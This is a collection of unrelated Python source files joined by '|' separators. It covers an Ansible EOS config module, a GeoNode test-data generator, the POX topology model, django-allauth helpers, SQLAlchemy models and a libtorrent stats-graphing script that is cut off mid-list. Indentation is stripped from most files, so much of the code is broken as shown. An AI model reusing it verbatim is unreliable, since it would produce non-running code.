eos_template:
src: candidate_config.txt
config: current_config.txt
"""
RETURN = """
updates:
description: The set of commands that will be pushed to the remote device
returned: always
type: list
sample: ['...', '...']
responses:
description: The set of responses from issuing the commands on the device
  returned: when not check_mode
type: list
sample: ['...', '...']
"""
import re
def get_config(module):
config = module.params.get('config')
if not config and not module.params['force']:
config = module.config
return config
def filter_exit(commands):
# Filter out configuration mode commands followed immediately by an
# exit command indented by one level only, e.g.
# - route-map map01 permit 10
# - exit
#
# Build a temporary list as we filter, then copy the temp list
# back onto the commands list.
temp = []
ind_prev = 999
count = 0
for c in commands:
ind_this = c.count(' ')
if re.search(r"^\s*exit$", c) and ind_this == ind_prev + 1:
temp.pop()
count -= 1
if count != 0:
ind_prev = temp[-1].count(' ')
continue
temp.append(c)
ind_prev = ind_this
count += 1
return temp
def main():
""" main entry point for module execution
"""
argument_spec = dict(
src=dict(required=True),
force=dict(default=False, type='bool'),
include_defaults=dict(default=False, type='bool'),
backup=dict(default=False, type='bool'),
replace=dict(default=False, type='bool'),
config=dict()
)
mutually_exclusive = [('config', 'backup'), ('config', 'force')]
module = get_module(argument_spec=argument_spec,
mutually_exclusive=mutually_exclusive,
supports_check_mode=True)
replace = module.params['replace']
commands = list()
running = None
result = dict(changed=False)
candidate = NetworkConfig(contents=module.params['src'], indent=3)
if replace:
if module.params['transport'] == 'cli':
module.fail_json(msg='config replace is only supported over eapi')
commands = str(candidate).split('\n')
else:
contents = get_config(module)
if contents:
running = NetworkConfig(contents=contents, indent=3)
result['_backup'] = contents
if not module.params['force']:
commands = candidate.difference((running or list()))
else:
commands = str(candidate).split('\n')
if commands:
commands = filter_exit(commands)
if not module.check_mode:
commands = [str(c).strip() for c in commands]
response = module.configure(commands, replace=replace)
result['responses'] = response
result['changed'] = True
result['updates'] = commands
module.exit_json(**result)
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
from ansible.module_utils.shell import *
from ansible.module_utils.netcfg import *
from ansible.module_utils.eos import *
if __name__ == '__main__':
main()
|
import sys
import os
geonode_path = os.path.abspath(os.path.join(os.path.dirname(os.path.dirname(__file__)), '../geonode'))
sys.path.append(geonode_path)
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
import glob
from random import randint
from timeit import Timer
from django.core.files import File
from django.conf import settings
from taggit.models import Tag
from geonode.base.models import TopicCategory
from geonode.base.models import Region
from geonode.people.models import Profile
from geonode.documents.models import Document
from geonode.layers.models import Layer
from geonode.layers.utils import file_upload
from geonode.tasks.deletion import delete_layer
def get_random_user():
""" Get a random user """
users_count = Profile.objects.all().count()
    random_index = randint(0, users_count - 1)
return Profile.objects.all()[random_index]
def assign_random_category(resource):
""" Assign a random category to a resource """
random_index = randint(0, TopicCategory.objects.all().count() - 1)
tc = TopicCategory.objects.all()[random_index]
resource.category = tc
resource.save()
def assign_keywords(resource):
""" Assigns up to 5 keywords to resource """
for i in range(0, randint(0, 5)):
resource.keywords.add('keyword_%s' % randint(0, n_keywords))
def assign_regions(resource):
""" Assign up to 5 regions to resource """
for i in range(0, randint(0, 5)):
random_index = randint(0, Region.objects.all().count() - 1)
region = Region.objects.all()[random_index]
resource.regions.add(region)
def create_users(n_users):
""" Create n users in the database """
for i in range(0, n_users):
user = Profile()
user.username = 'user_%s' % i
user.save()
def set_resource(resource):
""" Assign poc, metadata_author, category and regions to resource """
resource.poc = get_random_user()
resource.metadata_author = get_random_user()
assign_random_category(resource)
assign_regions(resource)
def create_document(number):
""" Creates a new document """
file_list = glob.glob('%s*.jpg' % doc_path)
    random_index = randint(0, len(file_list) - 1)
file_uri = file_list[random_index]
title = 'Document N. %s' % number
img_filename = '%s_img.jpg' % number
doc = Document(title=title, owner=get_random_user())
doc.save()
    # JPEG content is binary, so open the file in binary mode.
    with open(file_uri, 'rb') as f:
img_file = File(f)
doc.doc_file.save(img_filename, img_file, True)
assign_keywords(doc)
# regions
resource = doc.get_self_resource()
set_resource(resource)
def create_layer(number):
""" Creates a new layer """
file_list = glob.glob('%s*.shp' % shp_path)
    random_index = randint(0, len(file_list) - 1)
file_uri = file_list[random_index]
layer = file_upload(file_uri)
# keywords
assign_keywords(layer)
# other stuff
resource = layer.get_self_resource()
set_resource(resource)
doc_path = '/tmp/docs/'
shp_path = '/tmp/shp/'
n_users = 50
n_keywords = 100
n_layers = 500
n_docs = 500
Tag.objects.all().delete()
Profile.objects.exclude(username='admin').exclude(username='AnonymousUser').delete()
create_users(n_users)
Document.objects.all().delete()
for d in range(0, n_docs):
t = Timer(lambda: create_document(d))
print 'Document %s generated in: %s' % (d, t.timeit(number=1))
for layer in Layer.objects.all():
delete_layer.delay(object_id=layer.id)
for l in range(0, n_layers):
t = Timer(lambda: create_layer(l))
print 'Layer %s generated in: %s' % (l, t.timeit(number=1))
|
"""
The Topology module is the root of an object model composed of entities
like switches, hosts, links, etc. This object model is populated by other
modules. For example, openflow.topology populates the topology object
with OpenFlow switches.
Note that this means that you often want to invoke something like:
$ ./pox.py topology openflow.discovery openflow.topology
"""
from pox.lib.revent import *
from pox.core import core
from pox.lib.addresses import *
import traceback
import pickle
class EntityEvent (Event):
def __init__ (self, entity):
Event.__init__(self)
self.entity = entity
class EntityJoin (EntityEvent):
"""
An entity has been added.
Note that if there is a more specific join event defined for a particular
entity, (e.g., SwitchJoin), this event will not be fired.
TODO: or we could always raise EntityJoins along with SwitchJoins, which
seems more intuitive to me.
"""
pass
class EntityLeave (EntityEvent):
"""
An entity has been removed
Note that if there is a more specific leave event defined for a particular
entity, (e.g., SwitchLeave), this event will not be fired.
TODO: or we could always raise EntityLeaves along with SwitchLeaves, which
seems more intuitive to me.
"""
pass
class SwitchEvent (EntityEvent): pass
class SwitchJoin (SwitchEvent):
"""
As opposed to ConnectionUp, SwitchJoin occurs over large time scales
(e.g. an administrator physically moving a switch).
"""
def __init__ (self, switch):
SwitchEvent.__init__(self, switch)
self.switch = switch
class SwitchLeave (SwitchEvent):
"""
As opposed to ConnectionDown, SwitchLeave occurs over large time scales
(e.g. an administrator physically moving a switch).
"""
pass
class SwitchConnectionUp(SwitchEvent):
def __init__(self, switch, connection):
SwitchEvent.__init__(self, switch)
self.switch = switch
self.connection = connection
class SwitchConnectionDown(SwitchEvent): pass
class HostEvent (EntityEvent): pass
class HostJoin (HostEvent): pass
class HostLeave (HostEvent): pass
class Update (Event):
"""
Fired by Topology whenever anything has changed
"""
def __init__ (self, event=None):
Event.__init__(self)
self.event = event
class Entity (object):
"""
Note that the Entity class is intentionally simple; It only serves as a
convenient SuperClass type.
It's up to subclasses to implement specific functionality (e.g.
OpenFlow1.0 switch functionality). The purpose of this design decision
is to prevent protocol specific details from being leaked into this
  module... but this design decision does /not/ imply that pox.topology
serves to define a generic interface to abstract entity types.
  NOTE: /all/ subclasses must call this superconstructor, since
  the unique self.id field is used by Topology
"""
# This is a counter used so that we can get unique IDs for entities.
# Some entities don't need this because they have more meaningful
# identifiers.
_next_id = 101
_all_ids = set()
_tb = {}
def __init__ (self, id=None):
if id:
if id in Entity._all_ids:
print("".join(traceback.format_list(self._tb[id])))
raise Exception("ID %s already taken" % str(id))
else:
while Entity._next_id in Entity._all_ids:
Entity._next_id += 1
id = Entity._next_id
self._tb[id] = traceback.extract_stack()
Entity._all_ids.add(id)
self.id = id
def serialize(self):
return pickle.dumps(self, protocol = 0)
  @classmethod
  def deserialize(cls, data):
    # pickle.loads() takes no protocol argument (it infers the protocol
    # from the data) and must be given the pickled bytes, not the class.
    return pickle.loads(data)
class Host (Entity):
"""
A generic Host entity.
"""
def __init__(self,id=None):
Entity.__init__(self, id)
class Switch (Entity):
"""
Subclassed by protocol-specific switch classes,
e.g. pox.openflow.topology.OpenFlowSwitch
"""
def __init__(self, id=None):
# Switches often have something more meaningful to use as an ID
# (e.g., a DPID or MAC address), so they take it as a parameter.
Entity.__init__(self, id)
class Port (Entity):
def __init__ (self, num, hwAddr, name):
Entity.__init__(self)
self.number = num
self.hwAddr = EthAddr(hwAddr)
self.name = name
class Controller (Entity):
def __init__(self, name, handshake_complete=False):
self.id = name
# TODO: python aliases?
self.name = name
self.handshake_complete = handshake_complete
def handshake_completed(self):
self.handshake_complete = True
class Topology (EventMixin):
_eventMixin_events = [
SwitchJoin,
SwitchLeave,
HostJoin,
HostLeave,
EntityJoin,
EntityLeave,
Update
]
_core_name = "topology" # We want to be core.topology
def __init__ (self, name="topology"):
EventMixin.__init__(self)
self._entities = {}
self.name = name
self.log = core.getLogger(name)
# If a client registers a handler for these events after they have
# already occurred, we promise to re-issue them to the newly joined
# client.
self._event_promises = {
SwitchJoin : self._fulfill_SwitchJoin_promise
}
def getEntityByID (self, ID, fail=False):
"""
Raises an exception if fail is True and the entity doesn't exist
See also: The 'entity' property.
"""
if fail:
return self._entities[ID]
else:
return self._entities.get(ID, None)
def removeEntity (self, entity):
del self._entities[entity.id]
self.log.info(str(entity) + " left")
if isinstance(entity, Switch):
self.raiseEvent(SwitchLeave, entity)
elif isinstance(entity, Host):
self.raiseEvent(HostLeave, entity)
else:
self.raiseEvent(EntityLeave, entity)
def addEntity (self, entity):
""" Will raise an exception if entity.id already exists """
if entity.id in self._entities:
raise RuntimeError("Entity exists")
self._entities[entity.id] = entity
self.log.debug(str(entity) + " (id: " + str(entity.id) + ") joined")
if isinstance(entity, Switch):
self.raiseEvent(SwitchJoin, entity)
elif isinstance(entity, Host):
self.raiseEvent(HostJoin, entity)
else:
self.raiseEvent(EntityJoin, entity)
def getEntitiesOfType (self, t=Entity, subtypes=True):
if subtypes is False:
return [x for x in self._entities.itervalues() if type(x) is t]
else:
return [x for x in self._entities.itervalues() if isinstance(x, t)]
def addListener(self, eventType, handler, once=False, weak=False,
priority=None, byName=False):
"""
We interpose on EventMixin.addListener to check if the eventType is
in our promise list. If so, trigger the handler for all previously
triggered events.
"""
if eventType in self._event_promises:
self._event_promises[eventType](handler)
return EventMixin.addListener(self, eventType, handler, once=once,
weak=weak, priority=priority,
byName=byName)
def raiseEvent (self, event, *args, **kw):
"""
Whenever we raise any event, we also raise an Update, so we extend
the implementation in EventMixin.
"""
rv = EventMixin.raiseEvent(self, event, *args, **kw)
if type(event) is not Update:
EventMixin.raiseEvent(self, Update(event))
return rv
def serialize (self):
"""
Picklize our current entities.
    Returns a hash: { id -> pickled entity }
"""
id2entity = {}
for id in self._entities:
entity = self._entities[id]
id2entity[id] = entity.serialize()
return id2entity
def deserializeAndMerge (self, id2entity):
"""
Given the output of topology.serialize(), deserialize each entity, and:
- insert a new Entry if it didn't already exist here, or
- update a pre-existing entry if it already existed
"""
for entity_id in id2entity.keys():
pickled_entity = id2entity[entity_id].encode('ascii', 'ignore')
entity = pickle.loads(pickled_entity)
entity.id = entity_id.encode('ascii', 'ignore')
try:
# Try to parse it as an int
entity.id = int(entity.id)
except ValueError:
pass
existing_entity = self.getEntityByID(entity.id)
if existing_entity:
self.log.debug("New metadata for %s: %s " % (str(existing_entity), str(entity)))
        # TODO: define an Entity.merge method (need to do something about this update!)
else:
self.addEntity(entity)
def _fulfill_SwitchJoin_promise(self, handler):
""" Trigger the SwitchJoin handler for all pre-existing switches """
for switch in self.getEntitiesOfType(Switch, True):
handler(SwitchJoin(switch))
def __len__(self):
return len(self._entities)
def __str__(self):
# TODO: display me graphically
strings = []
strings.append("topology (%d total entities)" % len(self._entities))
for id,entity in self._entities.iteritems():
strings.append("%s %s" % (str(id), str(entity)))
return '\n'.join(strings)
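# Usage sketch (assumption, illustrative only): inside a running POX process
# other components reach this object as core.topology; thanks to the
# SwitchJoin "promise" above, a handler registered late is still invoked for
# switches that joined earlier.
#
#   def _handle_SwitchJoin (event):
#     print("switch joined: %s" % event.switch)
#   core.topology.addListener(SwitchJoin, _handle_SwitchJoin)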
|
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import ansible._vendor
from ansible.release import __version__, __author__
|
import base64
import re
import unicodedata
import json
from django.core.exceptions import ImproperlyConfigured
from django.core.validators import validate_email, ValidationError
from django.core import urlresolvers
from django.contrib.sites.models import Site
from django.db.models import FieldDoesNotExist
from django.db.models.fields import (DateTimeField, DateField,
EmailField, TimeField,
BinaryField)
from django.utils import six, dateparse
from django.utils.six.moves.urllib.parse import urlsplit
from django.core.serializers.json import DjangoJSONEncoder
try:
from django.utils.encoding import force_text, force_bytes
except ImportError:
from django.utils.encoding import force_unicode as force_text
try:
import importlib
except ImportError:
from django.utils import importlib
def _generate_unique_username_base(txts, regex=None):
username = None
    regex = regex or r'[^\w\s@+.-]'
for txt in txts:
if not txt:
continue
username = unicodedata.normalize('NFKD', force_text(txt))
username = username.encode('ascii', 'ignore').decode('ascii')
username = force_text(re.sub(regex, '', username).lower())
        # Django allows for '@' in usernames in order to accommodate
        # projects wanting to use e-mail for username. In allauth we don't
        # use this, we already have a proper place for putting e-mail
        # addresses (EmailAddress), so let's not use the full e-mail
        # address and only take the part leading up to the '@'.
username = username.split('@')[0]
username = username.strip()
        username = re.sub(r'\s+', '_', username)
if username:
break
return username or 'user'
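# Example of the pipeline above (illustrative): accented input is folded to
# ASCII, lowercased, split at '@', and whitespace becomes underscores, e.g.
#   _generate_unique_username_base([u'J\xf6hn D\xf4e'])  ->  u'john_doe'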
def get_username_max_length():
from .account.app_settings import USER_MODEL_USERNAME_FIELD
if USER_MODEL_USERNAME_FIELD is not None:
User = get_user_model()
max_length = User._meta.get_field(USER_MODEL_USERNAME_FIELD).max_length
else:
max_length = 0
return max_length
def generate_unique_username(txts, regex=None):
from .account.app_settings import USER_MODEL_USERNAME_FIELD
username = _generate_unique_username_base(txts, regex)
User = get_user_model()
max_length = get_username_max_length()
i = 0
while True:
try:
if i:
pfx = str(i + 1)
else:
pfx = ''
ret = username[0:max_length - len(pfx)] + pfx
query = {USER_MODEL_USERNAME_FIELD + '__iexact': ret}
User.objects.get(**query)
i += 1
except User.DoesNotExist:
return ret
def valid_email_or_none(email):
ret = None
try:
if email:
validate_email(email)
if len(email) <= EmailField().max_length:
ret = email
except ValidationError:
pass
return ret
def email_address_exists(email, exclude_user=None):
from .account import app_settings as account_settings
from .account.models import EmailAddress
emailaddresses = EmailAddress.objects
if exclude_user:
emailaddresses = emailaddresses.exclude(user=exclude_user)
ret = emailaddresses.filter(email__iexact=email).exists()
if not ret:
email_field = account_settings.USER_MODEL_EMAIL_FIELD
if email_field:
users = get_user_model().objects
if exclude_user:
users = users.exclude(pk=exclude_user.pk)
ret = users.filter(**{email_field+'__iexact': email}).exists()
return ret
def import_attribute(path):
assert isinstance(path, six.string_types)
pkg, attr = path.rsplit('.', 1)
ret = getattr(importlib.import_module(pkg), attr)
return ret
def import_callable(path_or_callable):
if not hasattr(path_or_callable, '__call__'):
ret = import_attribute(path_or_callable)
else:
ret = path_or_callable
return ret
try:
from django.contrib.auth import get_user_model
except ImportError:
# To keep compatibility with Django 1.4
def get_user_model():
from . import app_settings
from django.db.models import get_model
try:
app_label, model_name = app_settings.USER_MODEL.split('.')
except ValueError:
raise ImproperlyConfigured("AUTH_USER_MODEL must be of the"
" form 'app_label.model_name'")
user_model = get_model(app_label, model_name)
if user_model is None:
raise ImproperlyConfigured("AUTH_USER_MODEL refers to model"
" '%s' that has not been installed"
% app_settings.USER_MODEL)
return user_model
def get_current_site(request=None):
"""Wrapper around ``Site.objects.get_current`` to handle ``Site`` lookups
by request in Django >= 1.8.
:param request: optional request object
:type request: :class:`django.http.HttpRequest`
"""
# >= django 1.8
if request and hasattr(Site.objects, '_get_site_by_request'):
site = Site.objects.get_current(request=request)
else:
site = Site.objects.get_current()
return site
def resolve_url(to):
"""
Subset of django.shortcuts.resolve_url (that one is 1.5+)
"""
try:
return urlresolvers.reverse(to)
except urlresolvers.NoReverseMatch:
# If this doesn't "feel" like a URL, re-raise.
if '/' not in to and '.' not in to:
raise
# Finally, fall back and assume it's a URL
return to
def serialize_instance(instance):
"""
Since Django 1.6 items added to the session are no longer pickled,
but JSON encoded by default. We are storing partially complete models
in the session (user, account, token, ...). We cannot use standard
    Django serialization, as these models are not "complete" yet.
Serialization will start complaining about missing relations et al.
"""
data = {}
for k, v in instance.__dict__.items():
if k.startswith('_') or callable(v):
continue
try:
if isinstance(instance._meta.get_field(k), BinaryField):
v = force_text(base64.b64encode(v))
except FieldDoesNotExist:
pass
data[k] = v
return json.loads(json.dumps(data, cls=DjangoJSONEncoder))
def deserialize_instance(model, data):
ret = model()
for k, v in data.items():
if v is not None:
try:
f = model._meta.get_field(k)
if isinstance(f, DateTimeField):
v = dateparse.parse_datetime(v)
elif isinstance(f, TimeField):
v = dateparse.parse_time(v)
elif isinstance(f, DateField):
v = dateparse.parse_date(v)
elif isinstance(f, BinaryField):
v = force_bytes(
base64.b64decode(
force_bytes(v)))
except FieldDoesNotExist:
pass
setattr(ret, k, v)
return ret
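# Round-trip sketch (assumption, illustrative only; SocialToken stands in
# for any partially complete model instance stored in the session):
#
#   token = SocialToken(token='abc')
#   data = serialize_instance(token)                   # JSON-safe dict
#   restored = deserialize_instance(SocialToken, data)
#   assert restored.token == token.token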
def set_form_field_order(form, fields_order):
if hasattr(form.fields, 'keyOrder'):
form.fields.keyOrder = fields_order
else:
# Python 2.7+
from collections import OrderedDict
assert isinstance(form.fields, OrderedDict)
form.fields = OrderedDict((f, form.fields[f])
for f in fields_order)
def build_absolute_uri(request, location, protocol=None):
"""request.build_absolute_uri() helper
Like request.build_absolute_uri, but gracefully handling
the case where request is None.
"""
from .account import app_settings as account_settings
if request is None:
site = get_current_site()
bits = urlsplit(location)
if not (bits.scheme and bits.netloc):
uri = '{proto}://{domain}{url}'.format(
proto=account_settings.DEFAULT_HTTP_PROTOCOL,
domain=site.domain,
url=location)
else:
uri = location
else:
uri = request.build_absolute_uri(location)
if protocol:
uri = protocol + ':' + uri.partition(':')[2]
return uri
def get_form_class(forms, form_id, default_form):
form_class = forms.get(form_id, default_form)
if isinstance(form_class, six.string_types):
form_class = import_attribute(form_class)
return form_class
def get_request_param(request, param, default=None):
return request.POST.get(param) or request.GET.get(param, default)
|
from . import mrp_production
|
from sqlalchemy import Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class World(Base):
__tablename__ = 'world'
id = Column(Integer, primary_key=True)
randomnumber = Column(Integer)
sa_worlds = World.__table__
class Fortune(Base):
__tablename__ = 'fortune'
id = Column(Integer, primary_key=True)
message = Column(String)
sa_fortunes = Fortune.__table__
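# Usage sketch (assumption, illustrative only; the in-memory sqlite URL is a
# stand-in for the benchmark's real database):
if __name__ == '__main__':
    from sqlalchemy import create_engine
    from sqlalchemy.orm import sessionmaker
    engine = create_engine('sqlite://')
    Base.metadata.create_all(engine)
    session = sessionmaker(bind=engine)()
    session.add(World(id=1, randomnumber=42))
    session.commit()
    print(session.query(World).get(1).randomnumber)  # -> 42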
|
from collections import namedtuple
name0 = "name"
name = name0
nt = namedtuple(name, ["x", "y"])
|
import os, sys, time
from multiprocessing.pool import ThreadPool
thread_pool = ThreadPool(4)
stat = open(sys.argv[1])
line = stat.readline()
while 'second:' not in line:
line = stat.readline()
keys = line.strip().split(':')[1:]
output_dir = 'session_stats_report'
line_graph = 0
histogram = 1
stacked = 2
graph_colors = []
pattern = [[0,0,1], [0,1,0], [1,0,0], [1,0,1], [0,1,1], [1,1,0]]
def process_color(c, op):
for i in range(3):
if op == 0:
c[i] = min(255, c[i] + 0xb0)
if op == 2:
c[i] = max(0, c[i] - 0x50)
return c
for i in range(0, len(pattern) * 3):
    op = i / len(pattern)
    c = list(pattern[i % len(pattern)])
    # use a separate index so the outer loop variable isn't shadowed
    for j in range(3): c[j] *= 0xff
    c = process_color(c, op)
    c = '#%02x%02x%02x' % (c[0], c[1], c[2])
    graph_colors.append(c)
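# The loop above yields 18 colors: each of the 6 base patterns brightened
# (op 0), at full intensity (op 1) and darkened (op 2); e.g. pure blue
# [0, 0, 1] maps to '#b0b0ff', '#0000ff' and '#0000af' respectively.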
line_colors = list(graph_colors)
line_colors.reverse()
def plot_fun(script):
    os.system('gnuplot "%s" 2>/dev/null' % script)
sys.stdout.write('.')
sys.stdout.flush()
def gen_report(name, unit, lines, short_unit, generation, log_file, type=line_graph):
try:
os.mkdir(output_dir)
except: pass
filename = os.path.join(output_dir, '%s_%04d.png' % (name, generation))
thumb = os.path.join(output_dir, '%s_%04d_thumb.png' % (name, generation))
# don't re-render a graph unless the logfile has changed
try:
dst1 = os.stat(filename)
dst2 = os.stat(thumb)
src = os.stat(log_file)
if dst1.st_mtime > src.st_mtime and dst2.st_mtime > src.st_mtime:
sys.stdout.write('.')
return None
except: pass
script = os.path.join(output_dir, '%s_%04d.gnuplot' % (name, generation))
out = open(script, 'wb')
print >>out, "set term png size 1200,700"
print >>out, 'set output "%s"' % filename
print >>out, 'set yrange [0:*]'
print >>out, "set tics nomirror"
print >>out, "set key box"
if type == histogram:
        binwidth = 0.005
print >>out, 'binwidth=%f' % binwidth
print >>out, 'set boxwidth binwidth'
print >>out, 'bin(x,width)=width*floor(x/width) + binwidth/2'
print >>out, 'set xrange [0:%f]' % (binwidth * 100)
print >>out, 'set xlabel "%s"' % unit
print >>out, 'set ylabel "number"'
k = lines[0]
try:
column = keys.index(k) + 2
except:
print '"%s" not found' % k
return
print >>out, 'plot "%s" using (bin($%d,binwidth)):(1.0) smooth freq with boxes' % (log_file, column)
print >>out, ''
print >>out, ''
print >>out, ''
elif type == stacked:
print >>out, 'set xrange [0:*]'
print >>out, 'set ylabel "%s"' % unit
print >>out, 'set xlabel "time (s)"'
print >>out, 'set format y "%%.1s%%c%s";' % short_unit
print >>out, 'set style fill solid 1.0 noborder'
print >>out, 'plot',
column = 2
first = True
prev = ''
graph = ''
plot_expression = ''
color = 0
for k in lines:
try:
column = keys.index(k) + 2
except:
print '"%s" not found' % k
continue;
if not first:
plot_expression = ', ' + plot_expression
graph += '+'
axis = 'x1y1'
graph += '$%d' % column
plot_expression = ' "%s" using 1:(%s) title "%s" axes %s with filledcurves y1=0 lc rgb "%s"' % (log_file, graph, k, axis, graph_colors[color % len(graph_colors)]) + plot_expression
first = False
color += 1
print >>out, plot_expression
else:
print >>out, 'set xrange [0:*]'
print >>out, 'set ylabel "%s"' % unit
print >>out, 'set xlabel "time (s)"'
print >>out, 'set format y "%%.1s%%c%s";' % short_unit
print >>out, 'plot',
column = 2
first = True
color = 0
for k in lines:
try:
column = keys.index(k) + 2
except:
print '"%s" not found' % k
continue;
if not first: print >>out, ', ',
axis = 'x1y1'
print >>out, ' "%s" using 1:%d title "%s" axes %s with steps lc rgb "%s"' % (log_file, column, k, axis, line_colors[color % len(line_colors)]),
first = False
color += 1
print >>out, ''
print >>out, 'set term png size 150,100'
print >>out, 'set output "%s"' % thumb
print >>out, 'set key off'
print >>out, 'unset tics'
print >>out, 'set format x ""'
print >>out, 'set format y ""'
print >>out, 'set xlabel ""'
print >>out, 'set ylabel ""'
print >>out, 'set y2label ""'
print >>out, 'set rmargin 0'
print >>out, 'set lmargin 0'
print >>out, 'set tmargin 0'
print >>out, 'set bmargin 0'
print >>out, "replot"
out.close()
return script
def gen_html(reports, generations):
file = open(os.path.join(output_dir, 'index.html'), 'w+')
css = '''img { margin: 0}
#head { display: block }
#graphs { white-space:nowrap; }
h1 { line-height: 1; display: inline }
    h2 { line-height: 1; display: inline; font-size: 1em; font-weight: normal }'''
print >>file, '<html><head><style type="text/css">%s</style></head><body>' % css
for i in reports:
print >>file, '<div id="head"><h1>%s </h1><h2>%s</h2><div><div id="graphs">' % (i[0], i[3])
for g in generations:
print >>file, '<a href="%s_%04d.png"><img src="%s_%04d_thumb.png"></a>' % (i[0], g, i[0], g)
print >>file, '</div>'
print >>file, '</body></html>'
file.close()
reports = [
('torrents', 'num', '', 'number of torrents in different torrent states', ['downloading torrents', 'seeding torrents', \
'checking torrents', 'stopped torrents', 'upload-only torrents', 'error torrents', 'queued seed torrents', \
'queued download torrents'], stacked),
('torrents_want_peers', 'num', '', 'number of torrents that want more peers', ['torrents want more peers']),
('peers', 'num', '', 'num connected peers', ['peers', 'connecting peers', 'connection attempts', 'banned peers', 'total peers']),
('peers_max', 'num', '', 'num connected peers', ['peers', 'connecting peers', 'connection attempts', 'banned peers', 'max connections', 'total peers']),
('peer_churn', 'num', '', 'connecting and disconnecting peers', ['connecting peers', 'connection attempts']),
('peer_limits', 'num', '', 'number of connections per limit', ['average peers per limit']),
('connect_candidates', 'num', '', 'number of peers we know of that we can connect to', ['connect candidates']),
('peers_list_size', 'num', '', 'number of known peers (not necessarily connected)', ['num list peers']),
('overall_rates', 'rate', 'B/s', 'download and upload rates', ['uploaded bytes', 'downloaded bytes', 'upload rate', 'download rate', 'smooth upload rate', 'smooth download rate']),
('disk_write_queue', 'Bytes', 'B', 'bytes queued up by peers, to be written to disk', ['disk write queued bytes', 'disk queue limit', 'disk queue low watermark']),
('peers_requests', 'num', '', 'incoming piece request rate', ['piece requests', 'piece rejects', 'max piece requests', 'invalid piece requests', 'choked piece requests', 'cancelled piece requests']),
('peers_upload', 'num', '', 'number of peers by state wrt. uploading', ['peers up interested', 'peers up unchoked', 'peers up requests', 'peers disk-up', 'peers up send buffer', 'peers bw-up', 'max unchoked']),
('peers_download', 'num', '', 'number of peers by state wrt. downloading', ['peers down interesting', 'peers down unchoked', 'peers down requests', 'peers disk-down', 'peers bw-down','num end-game peers']),
('peer_errors', 'num', '', 'number of peers by error that disconnected them', ['error peers', 'peer disconnects', 'peers eof', 'peers connection reset', 'connect timeouts', 'uninteresting peers disconnect', 'banned for hash failure', 'no memory peer errors', 'too many peers', 'transport timeout peers', 'connection refused peers', 'connection aborted peers', 'permission denied peers', 'no buffer peers', 'host unreachable peers', 'broken pipe peers', 'address in use peers', 'access denied peers', 'invalid argument peers', 'operation aborted peers']),
('peer_errors_incoming', 'num', '', 'number of peers by incoming or outgoing connection', ['error incoming peers', 'error outgoing peers']),
('peer_errors_transport', 'num', '', 'number of peers by transport protocol', ['error tcp peers', 'error utp peers']),
('peer_errors_encryption', 'num', '', 'number of peers by encryption level', ['error encrypted peers', 'error rc4 peers', 'peer disconnects']),
('incoming requests', 'num', '', 'incoming 16kiB block requests', ['pending incoming block requests', 'average pending incoming block requests']),
('waste', '% of all downloaded bytes', '%%', 'proportion of all downloaded bytes that were wasted', ['% failed payload bytes', '% wasted payload bytes', '% protocol bytes'], stacked),
    ('waste by source', '% of all wasted bytes', '%%', 'what\'s causing the waste', [ 'redundant timed-out', 'redundant cancelled', 'redundant unknown', 'redundant seed', 'redundant end-game', 'redundant closing'], stacked),
('average_disk_time_absolute', 'job time', 's', 'running averages of timings of disk operations', ['disk read time', 'disk write time', 'disk hash time', 'disk job time', 'disk sort time']),
('average_disk_queue_time', 'job queued time', 's', 'running averages of disk queue time', ['disk queue time', 'disk job time']),
('disk_time', '% of total disk job time', '%%', 'proportion of time spent by the disk thread', ['% read time', '% write time', '% hash time', '% sort time'], stacked),
('disk_cache_hits', 'blocks (16kiB)', '', '', ['disk block read', 'read cache hits', 'disk block written', 'disk read back']),
('disk_cache', 'blocks (16kiB)', '', 'disk cache size and usage', ['disk buffer allocations', 'read disk cache size', 'disk cache size', 'cache size']),
('disk_readback', '% of written blocks', '%%', 'portion of written blocks that had to be read back for hash verification', ['% read back']),
('disk_queue', 'number of queued disk jobs', '', 'queued disk jobs', ['disk queue size', 'disk read queue size', 'read job queue size limit']),
('disk_iops', 'operations/s', '', 'number of disk operations per second', ['read ops/s', 'write ops/s', 'smooth read ops/s', 'smooth write ops/s']),
('disk pending reads', 'Bytes', '', 'number of bytes peers are waiting for to be read from the disk', ['pending reading bytes']),
('mixed mode', 'rate', 'B/s', 'rates by transport protocol', ['TCP up rate','TCP down rate','uTP up rate','uTP down rate','TCP up limit','TCP down limit']),
('connection_type', 'num', '', 'peers by transport protocol', ['utp peers','tcp peers']),
('uTP delay', 'buffering delay', 's', 'network delays measured by uTP', ['uTP peak send delay','uTP peak recv delay', 'uTP avg send delay', 'uTP avg recv delay']),
('uTP send delay histogram', 'buffering delay', 's', 'send delays measured by uTP', ['uTP avg send delay'], histogram),
('uTP recv delay histogram', 'buffering delay', 's', 'receive delays measured by uTP', ['uTP avg recv delay'], histogram),
('uTP stats', 'num', '', 'number of uTP sockets by state', ['uTP idle', 'uTP syn-sent', 'uTP connected', 'uTP fin-sent', 'uTP close-wait'], stacked),
('system memory', '', '', 'virtual memory page count', ['active resident pages', 'inactive resident pages', 'pinned resident pages', 'free pages'], stacked),
('memory paging', '', '', 'vm disk activity', ['pageins', 'pageouts']),
('page faults', '', '', '', ['page faults']),
('CPU usage', '%', '', '', ['network thread system time', 'network thread user+system time']),
('boost.asio messages', 'events/s', '', 'number of messages posted per second', [ \
'read_counter', 'write_counter', 'tick_counter', 'lsd_counter', \
'lsd_peer_counter', 'udp_counter', 'accept_counter', 'disk_queue_counter', \
'disk_read_counter', 'disk_write_counter'], stacked),
('send_buffer_sizes', 'num', '', '', ['up 8', 'up 16', 'up 32', 'up 64', 'up 128', 'up 256', \
'up 512', 'up 1024', 'up 2048', 'up 4096', 'up 8192', 'up 16384', 'up 32768', 'up 65536', \
'up 131072', 'up 262144'], stacked),
('recv_buffer_sizes', 'num', '', '', ['down 8', 'down 16', 'down 32', 'down 64', 'down 128', \
'down 256', 'down 512', 'down 1024', 'down 2048', 'down 4096', 'down 8192', 'down 16384', \
'down 32768', 'down 65536', 'down 131072', 'down 262144'], stacked),
('tick_rate', 'time between ticks', 's', '', ['tick interval', 'tick residual']),
('peer_dl_rates', 'num', '', 'peers split into download rate buckets', ['peers down 0', 'peers down 0-2', 'peers down 2-5', 'peers down 5-10', 'peers down 50-100', 'peers down 100-'], stacked),
